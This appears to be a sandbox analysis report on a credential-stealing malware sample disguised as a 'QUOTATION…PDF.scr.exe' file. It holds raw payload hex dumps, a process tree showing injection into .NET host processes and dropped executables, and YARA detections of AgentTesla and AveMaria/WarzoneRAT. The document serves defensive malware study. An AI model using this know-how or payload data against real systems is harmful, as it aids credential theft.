91 40 64 07 3f 1c 73 69 47 5e 8b ee 55 04 e5 06 91 80 cc 32 76 cd e9
                                                                          Data Ascii: ;DyI<+B;(vEoAM*cM|q*#cV,[sCzvQi_ g#'*]^oi3d;z{tB:H7q<Ct?&@&O9dHX3&g&|az/VoJMP2u2z5EKI|AAY7Jt|k0Ml=g@d?siG^U2v
                                                                          2023-09-19 07:21:51 UTC289INData Raw: 11 a3 f5 81 10 20 98 f4 f8 63 73 0d c3 72 ef 73 d1 aa 63 ec 94 0d 28 ac 0d c2 d2 a6 00 71 c6 c1 13 53 36 9a 8c ad dc d0 8f 7e 5f 30 47 cc 1b 9b 69 e3 2a a8 69 1a e1 ce cd f0 9d 4a 76 c3 02 93 f5 c6 a5 9f eb a9 ef 2f f8 4e 37 e6 8a 90 3b 62 35 74 c0 0b 12 b1 b2 26 4b ca a9 c6 23 78 8b 90 11 a0 19 d2 26 93 e4 a5 46 90 a5 da a8 3b c5 63 34 0b 46 04 3e 8c 42 54 0e 19 d9 a7 f1 d8 17 ea 25 0d 88 ce 98 ee ab 4f 61 20 ff ad 2c ef 74 0e 7e bc db 92 9a 7c a5 e5 bb 38 60 01 b1 0b 69 40 dd 5e 4b 40 1b 74 83 3f 7a 09 a2 b0 ec 95 80 73 11 92 3f b5 b5 b8 fc 45 6e 87 5b 0e 06 e0 fc 45 36 5a ae 9d d1 72 e3 04 91 99 91 26 a5 10 ff 72 f1 bf 7f fe 40 13 f1 29 5e 27 1f f5 eb a8 1f 36 b5 c5 a4 6d be df 72 38 1b 22 3f e9 cc 93 3d a7 c0 5d 04 e4 a4 a3 a9 89 a4 96 fd 31 16 4b f7
                                                                          Data Ascii: csrsc(qS6~_0Gi*iJv/N7;b5t&K#x&F;c4F>BT%Oa ,t~|8`i@^K@t?zs?En[E6Zr&r@)^'6mr8"?=]1K
                                                                          2023-09-19 07:21:51 UTC305INData Raw: c7 73 98 3d a1 76 c8 76 a2 ca 7a 0a e6 cc 64 7a dd a2 b6 0b ee ad d4 93 7a 4a 2f 87 59 e9 7c b4 f5 2c 5f f0 3c 10 8c ef 0f db 54 cd 15 94 c2 12 bb fc 20 59 4e 94 eb 5a 5e 44 41 2e 26 e1 bb 75 e6 6f 99 5b 3c e8 ad 2c 29 e3 a2 c1 49 fe 56 71 4c d5 e8 87 be 94 13 bf 12 2d ab 06 df 92 d6 01 03 88 8c e2 0c 65 73 65 0d 11 c1 fb 26 27 19 d3 58 b2 63 20 c2 82 f1 8b 8c a8 3f 82 50 2c 7d 9f 34 76 a4 10 66 c0 c1 69 f0 79 ba ce f0 e7 dc 84 b9 7d 19 89 07 66 7f 24 21 7b 8e 50 38 64 7d 90 4c 4e 7a ac 85 02 46 41 39 58 07 30 08 01 77 70 62 a7 94 f6 fb 08 0a 66 75 df e2 5b b4 74 81 0b e1 65 19 d3 ba 75 ca 8d de 76 42 d7 f3 4e e2 52 71 bc dd 78 76 b7 d9 ff 6e 46 b2 1b 55 87 65 d6 ce 5d bb ce 00 2c 8a d0 34 06 51 2b d2 94 ae b2 65 09 e1 59 a2 98 79 39 17 96 5e 25 75 51 01
                                                                          Data Ascii: s=vvzdzzJ/Y|,_<T YNZ^DA.&uo[<,)IVqL-ese&'Xc ?P,}4vfiy}f$!{P8d}LNzFA9X0wpbfu[teuvBNRqxvnFUe],4Q+eYy9^%uQ
                                                                          2023-09-19 07:21:51 UTC321INData Raw: 73 61 67 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 4e 75 6c 6c 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74 65 00 54 61 72 67 65 74 46 72 61 6d 65 77 6f 72 6b 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72
                                                                          Data Ascii: sageAttributeDebuggableAttributeNullableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttr
                                                                          2023-09-19 07:21:51 UTC337INData Raw: ff f3 ff ff ff e7 ff ff 18 64 05 00 68 05 00 00 00 00 00 00 00 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 cc ff ff 00 99 ff ff 00 66 ff ff 00 33 ff ff 00 00 ff ff 00 ff cc ff 00 cc cc ff 00 99 cc ff 00 66 cc ff 00 33 cc ff 00 00 cc ff 00 ff 99 ff 00 cc 99 ff 00 99 99 ff 00 66 99 ff 00 33 99 ff 00 00 99 ff 00 ff 66 ff 00 cc 66 ff 00 99 66 ff 00 66 66 ff 00 33 66 ff 00 00 66 ff 00 ff 33 ff 00 cc 33 ff 00 99 33 ff 00 66 33 ff 00 33 33 ff 00 00 33 ff 00 ff 00 ff 00 cc 00 ff 00 99 00 ff 00 66 00 ff 00 33 00 ff 00 00 00 ff 00 ff ff cc 00 cc ff cc 00 99 ff cc 00 66 ff cc 00 33 ff cc 00 00 ff cc 00 ff cc cc 00 cc cc cc 00 99 cc cc 00 66 cc cc 00 33 cc cc 00 00 cc cc
                                                                          Data Ascii: dh( f3f3f3fffff3ff333f3333f3f3f3
                                                                          2023-09-19 07:21:51 UTC353INData Raw: f6 f5 f6 48 ef ed ee 00 c8 c9 ca 00 a0 a0 a2 00 66 66 68 00 74 70 6d 00 95 8c 8a 00 be b1 ad 00 c2 b2 ae 00 c3 b7 b2 00 fc 07 00 00 f0 03 00 00 e0 01 00 00 c0 00 00 00 c0 00 00 00 c0 00 00 00 c0 00 00 00 c0 01 00 00 80 01 00 00 80 07 00 00 00 07 00 00 00 0f 00 00 18 1f 00 00 78 3f 00 00 f8 ff 00 00 f9 ff 00 00 78 a4 05 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 00 30 30 10 00 01 00 04 00 68 06 00 00 01 00 20 20 10 00 01 00 04 00 e8 02 00 00 02 00 10 10 10 00 01 00 04 00 28 01 00 00 03 00 30 30 00 00 01 00 08 00 a8 0e 00 00 04 00 20 20 00 00 01 00 08 00 a8 08 00 00 05 00 10 10 00 00 01 00 08 00 68 05 00 00 06 00 30 30 00 00 01 00 20 00 a8 25 00 00 07 00 20 20 00 00 01 00 20 00 a8 10 00 00 08 00 10 10 00 00 01 00 20 00 68 04 00 00 09 00 0c a5 05
                                                                          Data Ascii: Hffhtpmx?x00h (00 h00 % h



                                                                          Target ID:0
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          Imagebase:0x800000
                                                                          File size:387'072 bytes
                                                                          MD5 hash:404E68A96892ECFCB88A114E31ABB55C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.311069097.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.311069097.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.311307697.0000000005410000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:1
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                          Imagebase:0xc30000
                                                                          File size:232'960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6bab10000
                                                                          File size:625'664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:ipconfig /release
                                                                          Imagebase:0xbd0000
                                                                          File size:29'184 bytes
                                                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:09:21:36
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}
                                                                          Imagebase:0x7ff6bab10000
                                                                          File size:20'888 bytes
                                                                          MD5 hash:2528137C6745C4EADD87817A1909677E
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:09:21:43
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                          Imagebase:0xc30000
                                                                          File size:232'960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:09:21:43
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6bab10000
                                                                          File size:625'664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:09:21:43
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:ipconfig /renew
                                                                          Imagebase:0xbd0000
                                                                          File size:29'184 bytes
                                                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:09:21:48
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          Imagebase:0x820000
                                                                          File size:102'568 bytes
                                                                          MD5 hash:4DF5F963C7E18F062E49870D0AFF8F6F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000018.00000002.471458642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:25
                                                                          Start time:09:21:50
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\AppData\Local\Temp\donexx.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\donexx.exe"
                                                                          Imagebase:0x6c0000
                                                                          File size:363'008 bytes
                                                                          MD5 hash:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408924727.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.409456316.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 29%, ReversingLabs
                                                                          • Detection: 47%, Virustotal, Browse
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:33
                                                                          Start time:09:22:34
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          Imagebase:0xf90000
                                                                          File size:55'384 bytes
                                                                          MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: AveMaria_WarZone, Description: unknown, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:36
                                                                          Start time:09:22:44
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Fhzejfh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Fhzejfh.exe"
                                                                          Imagebase:0x400000
                                                                          File size:363'008 bytes
                                                                          MD5 hash:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.473185909.0000000003A42000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.000000000293A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 29%, ReversingLabs
                                                                          • Detection: 47%, Virustotal, Browse
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:38
                                                                          Start time:09:22:52
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Fhzejfh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Fhzejfh.exe"
                                                                          Imagebase:0x220000
                                                                          File size:363'008 bytes
                                                                          MD5 hash:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.000000000287C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.473331957.00000000038D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.0000000002884000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.0000000002864000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.000000000260A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q
                                                                            • API String ID: 0-1760409148
                                                                            • Opcode ID: 34da4fafa952cd57d8f1a257dede727138b8a9a40fec1ec5be4426d5a67db8cc
                                                                            • Instruction ID: e10963c4b920a390ef74b9b55a28a42fe812d3aafb1208a6ff2938e1c652852a
                                                                            • Opcode Fuzzy Hash: 34da4fafa952cd57d8f1a257dede727138b8a9a40fec1ec5be4426d5a67db8cc
                                                                            • Instruction Fuzzy Hash: 2E51F4307042059FCB149B398990B6A77B6BB85710F2549AAE807DB3D9DF31DD06CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%


                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: feq$ feq$4'`q
                                                                            • API String ID: 0-3260169214
                                                                            • Opcode ID: b417d1995814164dbb74ab3cf50ea6ddf56cbb7173dab821efb672ec4351d424
                                                                            • Instruction ID: 7cc10c13223822e54df624d625506b6c3ef4a56c979b3f2e3158f6599ade08be
                                                                            • Opcode Fuzzy Hash: b417d1995814164dbb74ab3cf50ea6ddf56cbb7173dab821efb672ec4351d424
                                                                            • Instruction Fuzzy Hash: 5621FC30E0020EDBCB44EFA4E5505EEBBB6FF94304F604968D11AA72A4DB766A05CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq$Hdq
                                                                            • API String ID: 0-3598684399
                                                                            • Opcode ID: 660e8450b85eeaccb1c46f5f5e472e88648eba867566595ac945ba433a97a4eb
                                                                            • Instruction ID: b6839f96543217ac739829b0d8f9bb86007e08cdab9c56ce5682b62512688bc1
                                                                            • Opcode Fuzzy Hash: 660e8450b85eeaccb1c46f5f5e472e88648eba867566595ac945ba433a97a4eb
                                                                            • Instruction Fuzzy Hash: 9341E0352147858FD324DF3AD59035BBBE2AF80314F108A2AD457CBAA5EF74E845CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: 615796bafe22f0459c6c31ce3ab843e9684f041a1cb80c4204eb4a338ca59f40
                                                                            • Instruction ID: 4f08bc0e59ffe6e32d588f4af6f53f4b3232bb4527f3745a200e8af83b584bb9
                                                                            • Opcode Fuzzy Hash: 615796bafe22f0459c6c31ce3ab843e9684f041a1cb80c4204eb4a338ca59f40
                                                                            • Instruction Fuzzy Hash: 82218E70B502089FCB48AFB9D5A86AEBAF7ABC8700F50442DE107E7394DE758C058B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: 31eccc682fe041d486d910fe4cce781cc9b77a2f2785c069facdf59fbbe83877
                                                                            • Instruction ID: c43cb3cc7085d0e2de64098719795189c9ea41fa2b2865cd26c5aaab6fd8fe8e
                                                                            • Opcode Fuzzy Hash: 31eccc682fe041d486d910fe4cce781cc9b77a2f2785c069facdf59fbbe83877
                                                                            • Instruction Fuzzy Hash: C2216A70B502099FCB48ABB9D5A86AEBAF7AFC8700F50442DE107E7394DE758C058B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
